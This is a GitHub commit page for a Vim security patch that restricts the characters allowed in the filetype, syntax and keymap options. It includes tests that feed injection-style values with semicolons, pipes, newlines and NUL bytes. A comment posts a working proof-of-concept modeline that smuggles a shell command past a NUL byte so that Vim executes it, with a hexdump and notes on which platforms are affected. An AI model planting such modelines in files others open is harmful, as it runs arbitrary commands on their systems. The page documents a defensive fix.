Skip to content

Commit

Permalink
patch 8.0.0056
Browse files Browse the repository at this point in the history 
Problem:    When setting 'filetype' there is no check for a valid name.
Solution:   Only allow valid characters in 'filetype', 'syntax' and 'keymap'.
  • Loading branch information
@brammool
brammool committed Nov 4, 2016
1 parent 3a117e1 commit d0b5138
Show file tree
Hide file tree
Showing 3 changed files with 87 additions and 2 deletions.
38 changes: 36 additions & 2 deletions src/option.c
View file
Expand Up @@ -5822,6 +5822,21 @@ set_string_option(
return r;
}

/*
* Return TRUE if "val" is a valid 'filetype' name.
* Also used for 'syntax' and 'keymap'.
*/
static int
valid_filetype(char_u *val)
{
char_u *s;

for (s = val; *s != NUL; ++s)
if (!ASCII_ISALNUM(*s) && vim_strchr((char_u *)".-_", *s) == NULL)
return FALSE;
return TRUE;
}

/*
* Handle string options that need some action to perform when changed.
* Returns NULL for success, or an error message for an error.
Expand Down Expand Up @@ -6235,8 +6250,11 @@ did_set_string_option(
#ifdef FEAT_KEYMAP
else if (varp == &curbuf->b_p_keymap)
{
/* load or unload key mapping tables */
errmsg = keymap_init();
if (!valid_filetype(*varp))
errmsg = e_invarg;
else
/* load or unload key mapping tables */
errmsg = keymap_init();

if (errmsg == NULL)
{
Expand Down Expand Up @@ -7222,6 +7240,22 @@ did_set_string_option(
}
#endif

#ifdef FEAT_AUTOCMD
else if (gvarp == &p_ft)
{
if (!valid_filetype(*varp))
errmsg = e_invarg;
}
#endif

#ifdef FEAT_SYN_HL
else if (gvarp == &p_syn)
{
if (!valid_filetype(*varp))
errmsg = e_invarg;
}
#endif

/* Options that are a list of flags. */
else
{
Expand Down
49 changes: 49 additions & 0 deletions src/testdir/test_options.vim
View file
Expand Up @@ -48,3 +48,52 @@ func Test_signcolumn()
endif
endfunc

func Test_filetype_valid()
set ft=valid_name
call assert_equal("valid_name", &filetype)
set ft=valid-name
call assert_equal("valid-name", &filetype)

call assert_fails(":set ft=wrong;name", "E474:")
call assert_fails(":set ft=wrong\\\\name", "E474:")
call assert_fails(":set ft=wrong\\|name", "E474:")
call assert_fails(":set ft=wrong/name", "E474:")
call assert_fails(":set ft=wrong\\\nname", "E474:")
call assert_equal("valid-name", &filetype)

exe "set ft=trunc\x00name"
call assert_equal("trunc", &filetype)
endfunc

func Test_syntax_valid()
set syn=valid_name
call assert_equal("valid_name", &syntax)
set syn=valid-name
call assert_equal("valid-name", &syntax)

call assert_fails(":set syn=wrong;name", "E474:")
call assert_fails(":set syn=wrong\\\\name", "E474:")
call assert_fails(":set syn=wrong\\|name", "E474:")
call assert_fails(":set syn=wrong/name", "E474:")
call assert_fails(":set syn=wrong\\\nname", "E474:")
call assert_equal("valid-name", &syntax)

exe "set syn=trunc\x00name"
call assert_equal("trunc", &syntax)
endfunc

func Test_keymap_valid()
call assert_fails(":set kmp=valid_name", "E544:")
call assert_fails(":set kmp=valid_name", "valid_name")
call assert_fails(":set kmp=valid-name", "E544:")
call assert_fails(":set kmp=valid-name", "valid-name")

call assert_fails(":set kmp=wrong;name", "E474:")
call assert_fails(":set kmp=wrong\\\\name", "E474:")
call assert_fails(":set kmp=wrong\\|name", "E474:")
call assert_fails(":set kmp=wrong/name", "E474:")
call assert_fails(":set kmp=wrong\\\nname", "E474:")

call assert_fails(":set kmp=trunc\x00name", "E544:")
call assert_fails(":set kmp=trunc\x00name", "trunc")
endfunc
2 changes: 2 additions & 0 deletions src/version.c
View file
Expand Up @@ -764,6 +764,8 @@ static char *(features[]) =

static int included_patches[] =
{ /* Add new patch number below this line */
/**/
56,
/**/
55,
/**/
Expand Down

11 comments on commit d0b5138

@matlink
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Any PoC for this vuln?

@sebcat
Copy link

@sebcat sebcat commented on d0b5138 Nov 23, 2016

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@matlink

I put together a PoC:

echo -e '// vim: set ft=\x00!while\\ true;\\ do\\ echo\\ bar;\\ done\x00 : ' > wzz
vim wzz

works for me and a colleague, but it may depend on your vim (doesn't work for a friend of mine, trying to figure out why)

00000000  2f 2f 20 76 69 6d 3a 20  73 65 74 20 66 74 3d 00  |// vim: set ft=.|
00000010  21 77 68 69 6c 65 5c 20  74 72 75 65 3b 5c 20 64  |!while\ true;\ d|
00000020  6f 5c 20 65 63 68 6f 5c  20 62 61 72 3b 5c 20 64  |o\ echo\ bar;\ d|
00000030  6f 6e 65 00 20 3a 20 0a                           |one. : .|
00000038

@matlink
Copy link

@matlink matlink commented on d0b5138 Nov 23, 2016 via email

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@sebcat
Copy link

@sebcat sebcat commented on d0b5138 Nov 23, 2016

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@matlink

The other machine where it doesn't work is Ubuntu 14.04 (so debian based). What we saw there was that channel and job was not enabled (no +channel or +job in feature list).

Successful on Fedora, Arch and FreeBSD 11.0-RELEASE-p1 (though tcsh is the default shell there, and the test payload above is for bash, so SHELL should be set to /usr/local/bin/bash, or the test payload should be tcsh compatible)

FreeBSD version:

$ vim --version
VIM - Vi IMproved 8.0 (2016 Sep 12, compiled Oct  5 2016 15:43:16)
Included patches: 1-19
Compiled by root@110amd64-quarterly-job-16
Huge version without GUI.  Features included (+) or not (-):
+acl             +file_in_path    +mouse_sgr       +tag_old_static
+arabic          +find_in_path    +mouse_sysmouse  -tag_any_white
+autocmd         +float           +mouse_urxvt     -tcl
-balloon_eval    +folding         +mouse_xterm     +termguicolors
-browse          -footer          +multi_byte      +terminfo
++builtin_terms  +fork()          +multi_lang      +termresponse
+byte_offset     -gettext         -mzscheme        +textobjects
+channel         -hangul_input    +netbeans_intg   +timers
+cindent         +iconv           +num64           +title
-clientserver    +insert_expand   +packages        -toolbar
-clipboard       +job             +path_extra      +user_commands
+cmdline_compl   +jumplist        -perl            +vertsplit
+cmdline_hist    +keymap          +persistent_undo +virtualedit
+cmdline_info    +lambda          +postscript      +visual
+comments        +langmap         +printer         +visualextra
+conceal         +libcall         +profile         +viminfo
+cryptv          +linebreak       -python          +vreplace
+cscope          +lispindent      -python3         +wildignore
+cursorbind      +listcmds        +quickfix        +wildmenu
+cursorshape     +localmap        +reltime         +windows
+dialog_con      -lua             +rightleft       +writebackup
+diff            +menu            -ruby            -X11
+digraphs        +mksession       +scrollbind      -xfontset
-dnd             +modify_fname    +signs           -xim
-ebcdic          +mouse           +smartindent     -xpm
+emacs_tags      -mouseshape      +startuptime     -xsmp
+eval            +mouse_dec       +statusline      -xterm_clipboard
+ex_extra        -mouse_gpm       -sun_workshop    -xterm_save
+extra_search    -mouse_jsbterm   +syntax          
+farsi           +mouse_netterm   +tag_binary      
   system vimrc file: "/usr/local/etc/vim/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
       defaults file: "$VIMRUNTIME/defaults.vim"
  fall-back for $VIM: "/usr/local/etc/vim"
 f-b for $VIMRUNTIME: "/usr/local/share/vim/vim80"
Compilation: cc -c -I. -Iproto -DHAVE_CONFIG_H   -DLIBICONV_PLUG -I/usr/local/include  -O2 -pipe  -DLIBICONV_PLUG -fstack-protector -fno-strict-aliasing -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1      
Linking: cc   -fstack-protector -L/usr/local/lib -Wl,--as-needed -o vim               -lm -lelf  -ltermlib

Fedora version:

$ vim --version
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Jun  2 2016 10:02:05)
Included patches: 1-1868
Modified by <bugzilla@redhat.com>
Compiled by <bugzilla@redhat.com>
Huge version without GUI.  Features included (+) or not (-):
+acl             +farsi           +mouse_netterm   +tag_binary
+arabic          +file_in_path    +mouse_sgr       +tag_old_static
+autocmd         +find_in_path    -mouse_sysmouse  -tag_any_white
-balloon_eval    +float           +mouse_urxvt     -tcl
-browse          +folding         +mouse_xterm     +termguicolors
++builtin_terms  -footer          +multi_byte      +terminfo
+byte_offset     +fork()          +multi_lang      +termresponse
+channel         +gettext         -mzscheme        +textobjects
+cindent         -hangul_input    +netbeans_intg   +timers
-clientserver    +iconv           +packages        +title
-clipboard       +insert_expand   +path_extra      -toolbar
+cmdline_compl   +job             +perl/dyn        +user_commands
+cmdline_hist    +jumplist        +persistent_undo +vertsplit
+cmdline_info    +keymap          +postscript      +virtualedit
+comments        +langmap         +printer         +visual
+conceal         +libcall         +profile         +visualextra
+cryptv          +linebreak       +python/dyn      +viminfo
+cscope          +lispindent      +python3/dyn     +vreplace
+cursorbind      +listcmds        +quickfix        +wildignore
+cursorshape     +localmap        +reltime         +wildmenu
+dialog_con      +lua/dyn         +rightleft       +windows
+diff            +menu            +ruby/dyn        +writebackup
+digraphs        +mksession       +scrollbind      -X11
-dnd             +modify_fname    +signs           -xfontset
-ebcdic          +mouse           +smartindent     -xim
+emacs_tags      -mouseshape      +startuptime     -xsmp
+eval            +mouse_dec       +statusline      -xterm_clipboard
+ex_extra        +mouse_gpm       -sun_workshop    -xterm_save
+extra_search    -mouse_jsbterm   +syntax          -xpm
   system vimrc file: "/etc/vimrc"
     user vimrc file: "$HOME/.vimrc"
 2nd user vimrc file: "~/.vim/vimrc"
      user exrc file: "$HOME/.exrc"
  fall-back for $VIM: "/etc"
 f-b for $VIMRUNTIME: "/usr/share/vim/vim74"
Compilation: gcc -c -I. -Iproto -DHAVE_CONFIG_H     -O2 -g -pipe -Wall -Werror=format-security -fexceptions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -m64 -mtune=generic -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1      
Linking: gcc   -L. -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -fstack-protector -rdynamic -Wl,-export-dynamic -Wl,--enable-new-dtags -Wl,-z,relro   -Wl,-z,relro -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -L/usr/local/lib -Wl,--as-needed -o vim        -lm -lnsl  -lselinux   -lncurses -lacl -lattr -lgpm -ldl   -Wl,--enable-new-dtags -Wl,-z,relro  -Wl,-z,relro  -fstack-protector-strong -L/usr/local/lib  -L/usr/lib64/perl5/CORE -lperl -lpthread -lresolv -lnsl -ldl -lm -lcrypt -lutil -lc

@jamessan
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

That's because I disable modelines by default in Debian (not just for root) and recommend using a plugin like securemodelines instead.

@matlink
Copy link

@matlink matlink commented on d0b5138 Nov 23, 2016 via email

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@jamessan
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It has nothing to do with +channel or +job. You just need modelines enabled and syntax highlighting enabled.

@matlink
Copy link

@matlink matlink commented on d0b5138 Nov 23, 2016 via email
edited

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@jamessan
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Because you have an updated Vim which fixes the problem.

@matlink
Copy link

@matlink matlink commented on d0b5138 Nov 23, 2016 via email
edited

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@chrisbra
Copy link
Member

@chrisbra chrisbra commented on d0b5138 Nov 23, 2016
edited

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, your vim has been fixed (Debian already provides a backported fix). Check your apt logfile for a recently updated Vim package

Please sign in to comment.